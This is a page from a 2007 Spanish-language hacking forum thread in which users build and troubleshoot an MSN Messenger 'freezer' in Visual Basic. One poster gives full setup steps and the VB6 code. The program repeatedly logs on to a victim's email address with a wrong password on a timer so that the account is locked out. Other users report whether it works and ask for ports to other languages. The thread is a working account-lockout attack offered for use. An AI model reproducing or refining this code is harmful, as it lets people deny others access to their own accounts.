elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Fabricando un congelador tipo ice cold en vb[Optimizado]
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 3 4 5 6 [7] 8 Ir Abajo Respuesta Imprimir
Autor Tema: Fabricando un congelador tipo ice cold en vb[Optimizado]  (Leído 30,351 veces)
Tengu


Desconectado Desconectado

Mensajes: 330


2+1 = 1 , despues de todo , tdo es relativo


Ver Perfil WWW
Re: Fabricando un congelador tipo ice cold en vb
« Respuesta #60 en: 4 Agosto 2007, 04:36 am »

hola a todos pido disculpas por nhop escribir antes es q estaba en un viaje.

es verdad lo que dice tughack son demasiadas lineas de codigo para un freezer, pero es debibo a que el codigo lo he sacado de una aplicacion que estoy creando y tiene muchas mas opciones;(tal vez al momento de postearlo quedaron excedentes en el codigo pero crei que seria solo cuestion de tiempo para que los sacaran );la accion del codigo es la de conectar cada 10 segundos a la cuenta (puse 10 segundos para asegurarnos de que todos los intentos darian en el blanco //el tiempo puede bajarse dependiendo de la conexion que se dispone//el codigo realiza  15 intentos de conexion xk no eh contado bien pero creo que con 10 ya es suficiente).

Como dije antes el codigo solo conecta y desconecta asi que todos los exedentes de codigo que sean del tipo dataarrival o algo por el estilo(que son para recibir datos pueden quitarlos por completo y veran que el freezer seguira funcionando.

Esto fue la simple manera que encontre de haqcerlo asi que espero que pueda servirles de algo y lamento si no ha cumplido las expectativas de algunos. salu25


                                                                Tengu..::FireB0y::..


En línea


Encuentros por Video y Chat !!
Tengu


Desconectado Desconectado

Mensajes: 330


2+1 = 1 , despues de todo , tdo es relativo


Ver Perfil WWW
Re: Fabricando un congelador tipo ice cold en vb
« Respuesta #61 en: 4 Agosto 2007, 04:44 am »

ante cualquier duda solo agreguenme a su msn y les pasoi el proyecto totalmente funcional....   salu25 ;D


En línea


Encuentros por Video y Chat !!
wACtOr


Desconectado Desconectado

Mensajes: 461


Premio finalista diseño web elhacker.net


Ver Perfil
Re: Fabricando un congelador tipo ice cold en vb
« Respuesta #62 en: 4 Agosto 2007, 14:38 pm »

weno  tengu yo el tuyo si que lo he conseguido hacer funcionar, me costo lo mio, pero lo logre. el de kizar , pues me pasa como a mad, llega al 100%  y nada me puedo conectar como si nada. Por si alguien pregunta, estoy desconectado. Puede ser por que uso gmail?. no creo que fuera eso ya que al estar registrada en passport.

si alguien obtinene una solucion ya sabe donde estamos xDD
En línea

Tughack


Desconectado Desconectado

Mensajes: 490


Ver Perfil
Re: Fabricando un congelador tipo ice cold en vb
« Respuesta #63 en: 4 Agosto 2007, 14:40 pm »

weno  tengu yo el tuyo si que lo he conseguido hacer funcionar, me costo lo mio, pero lo logre. el de kizar , pues me pasa como a mad, llega al 100%  y nada me puedo conectar como si nada. Por si alguien pregunta, estoy desconectado. Puede ser por que uso gmail?. no creo que fuera eso ya que al estar registrada en passport.

si alguien obtinene una solucion ya sabe donde estamos xDD

Un freezer, caso funcione bien, puede congelar kualier cuenta asociada al net passport.

Probaste el mio?

Salu2
En línea

Tengu


Desconectado Desconectado

Mensajes: 330


2+1 = 1 , despues de todo , tdo es relativo


Ver Perfil WWW
Re: Fabricando un congelador tipo ice cold en vb
« Respuesta #64 en: 4 Agosto 2007, 19:28 pm »

Aqui eh vuelto para liberar un nuevo codigo sin fallas y muy optimizado jejejej por k yo no creo en guardarme los codes ya que son uds. "gente del foro" los que me han enseñado a aprender y compartir.. asi q presten atencion.

necesitaremos colocar en referencias(Proyecto->Referencias)

*Messeger Type Library
*Messenger API Type Library
*Messenger Private Type Library


agregar :

1 textbox llamado "txtusermail"
1 command llamado "congelar"
1 timer llamado "timer1"

1 textbox llamado "contador"
2 label llamados lblUserEmail y label1
1 slider llamado conexion



eh aqui el codigo que buscaban jejej si falta algo o falla algo posteenlo aqui salu25

Código:
Private MSN As New MsgrObject

Private Sub congelar_Click()
Timer1.Interval = conexion.Value
Timer1.Enabled = True
End Sub




Private Sub Form_Load()
Me.Caption = "Freezer 2 poir tengu jej"
lblUserEmail.Caption = "Direccion de E-mail"
contador.Visible = False
Label1.Caption = "Tiempo para realizar cada conexion"
conexion.Value = "15000"
End Sub

Private Sub Timer1_Timer()
On Error Resume Next
contador.Text = Val(contador.Text) + Val("1")
If contador.Text = "20" Then
Timer1.Enabled = False
MsgBox "congelada!!!", vbInformation, "Tengu Freezer 2"
End If
MSN.Logoff
    MSN.Logon txtUserEmail.Text, "Fucked by tengu", MSN.Services.PrimaryService
End Sub

Toodo va en el form1(sin modulos sin nada jejej)
« Última modificación: 4 Agosto 2007, 21:02 pm por Tengu ..::Fireb0y::.. » En línea


Encuentros por Video y Chat !!
‭‭‭‭jackl007


Desconectado Desconectado

Mensajes: 1.403


[UserRPL]


Ver Perfil WWW
Re: Fabricando un congelador tipo ice cold en vb[Optimizado]
« Respuesta #65 en: 5 Agosto 2007, 21:18 pm »

a mi no me congela
En línea

Tengu


Desconectado Desconectado

Mensajes: 330


2+1 = 1 , despues de todo , tdo es relativo


Ver Perfil WWW
Re: Fabricando un congelador tipo ice cold en vb[Optimizado]
« Respuesta #66 en: 5 Agosto 2007, 21:45 pm »

si ves que no funcina primero abre el windows messenger(no te logees solo tenlo abierto)
En línea


Encuentros por Video y Chat !!
Tengu


Desconectado Desconectado

Mensajes: 330


2+1 = 1 , despues de todo , tdo es relativo


Ver Perfil WWW
Re: Fabricando un congelador tipo ice cold en vb[Optimizado]
« Respuesta #67 en: 5 Agosto 2007, 21:52 pm »

y sino vamos a tener que resignarnos y usar el tuyo tughack jej no nos vendria mal un poco de tu ayuda eh jajaj
En línea


Encuentros por Video y Chat !!
‭‭‭‭jackl007


Desconectado Desconectado

Mensajes: 1.403


[UserRPL]


Ver Perfil WWW
Re: Fabricando un congelador tipo ice cold en vb[Optimizado]
« Respuesta #68 en: 5 Agosto 2007, 22:33 pm »

EStoy deacuerdo con eso...
vale la ayuda de tughack
En línea

mitripeo

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: Fabricando un congelador tipo ice cold en vb[Optimizado]
« Respuesta #69 en: 6 Agosto 2007, 19:40 pm »

alguien podria pasar ese codigo de VB a otro lenguaje soportado en unix, como C, PHP o perl.... seria bastante efectivo... si alguien puede comuniquemelo mitripeo@mitripeo.com
En línea

Páginas: 1 2 3 4 5 6 [7] 8 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
BitCoin: fabricando dinero digital ¿a costa de terceros?
Noticias
wolfbcn 9 5,362 Último mensaje 17 Junio 2011, 01:10 am
por dantemc
Juego sin engine y mal optimizado
Programación General
AWES0MN 0 4,209 Último mensaje 26 Enero 2013, 22:45 pm
por AWES0MN
Fabricando una Carcasa para Raspberry Pi
Hardware
B€T€B€ 0 1,680 Último mensaje 31 Julio 2019, 01:46 am
por B€T€B€
pregunto sobre el congelador o.o
Foro Libre
nightcode 4 2,289 Último mensaje 13 Octubre 2020, 21:02 pm
por Tachikomaia
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines